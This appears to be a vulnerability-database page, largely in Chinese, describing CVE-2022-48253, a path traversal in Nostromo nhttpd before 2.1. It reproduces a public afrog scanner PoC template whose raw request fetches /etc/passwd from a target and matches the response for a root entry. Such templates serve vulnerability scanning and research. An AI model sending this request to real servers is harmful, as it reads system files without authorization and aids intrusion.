CVE-2022-48253: Nostromo nhttpd path traversal

日期: 2025-09-01 | 影响软件: Nostromo nhttpd | POC: 已公开

漏洞描述

nhttpd in Nostromo before 2.1 is vulnerable to a path traversal that may allow an attacker to execute arbitrary commands on the remote server. The vulnerability occurs when the homedirs option is used.

PoC代码[已公开]

id: CVE-2022-48253

info:
  name: Nostromo nhttpd path traversal
  author: zan8in
  severity: critical
  verified: true
  description: |
    nhttpd in Nostromo before 2.1 is vulnerable to a path traversal that may allow an attacker to execute arbitrary commands on the remote server. The vulnerability occurs when the homedirs option is used.

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |-
        GET /etc/passwd HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: '"root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)'
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-48253.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

CVE-2022-0540: Atlassian Jira - Authentication bypass in Seraph POC

CVE-2022-0656: uDraw <3.3.3 - Local File Inclusion POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC